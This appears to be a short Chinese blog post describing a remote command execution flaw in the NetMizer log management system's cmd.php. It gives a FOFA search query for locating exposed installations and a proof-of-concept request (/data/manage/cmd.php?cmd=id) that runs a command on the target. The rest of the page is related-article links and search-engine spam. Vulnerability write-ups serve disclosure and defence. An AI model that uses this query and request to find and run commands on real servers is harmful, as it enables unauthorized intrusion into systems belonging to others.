当前位置: 首页 > news >正文

NetMizer-日志管理系统-远程命令执行漏洞挖掘

漏洞描述:NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行

1.fofa搜素语句

title="NetMizer 日志管理系统"

2.漏洞验证

网站页面

验证POC

/data/manage/cmd.php?cmd=id

 

 

相关文章:

  • 基于SpringBoot的美食分享系统-测试报告
  • AppArmor 使用说明
  • STM32蜂鸣器播放音乐
  • Git 删除敏感密钥
  • OpenCV图像拼接(6)图像拼接模块的用于创建权重图函数createWeightMap()
  • C++11之深度理解lambda表达式
  • Java学习总结-Stream流
  • SQLAlchemy关键词搜索技术深度解析:从基础过滤到全文检索
  • 沪深300股指期货的看涨看跌方式是怎样的?
  • 简单介绍My—Batis
  • CSS居中
  • Sql优化
  • Java Collection API增强功能系列之六 改进的 ConcurrentHashMap:归约、搜索、计数与 Set 视图详解
  • AI(DeepSeek、ChatGPT)、Python、ArcGIS Pro多技术融合下的空间数据分析、建模与科研绘图及论文写作
  • 2025BAT大厂Java面试2000题精选(附答案+考点分析)
  • 寻找一个合适的并发平衡点
  • apache安装脚本使用shell建立
  • shell脚本运行方式 bash 和./区别
  • Java设计模式之状态模式
  • 一次由特殊字符引发的Minio签名问题排查
  • 如何做网站充值/重庆百度seo整站优化
  • 淘宝网站怎样做/百度指数api
  • 杭州 城西 做网站/百度竞价托管外包
  • 短视频推广广告/泉州seo代理商
  • 建站之星服务器/每天看七个广告赚40元的app
  • 做编程题的网站/推广网站文案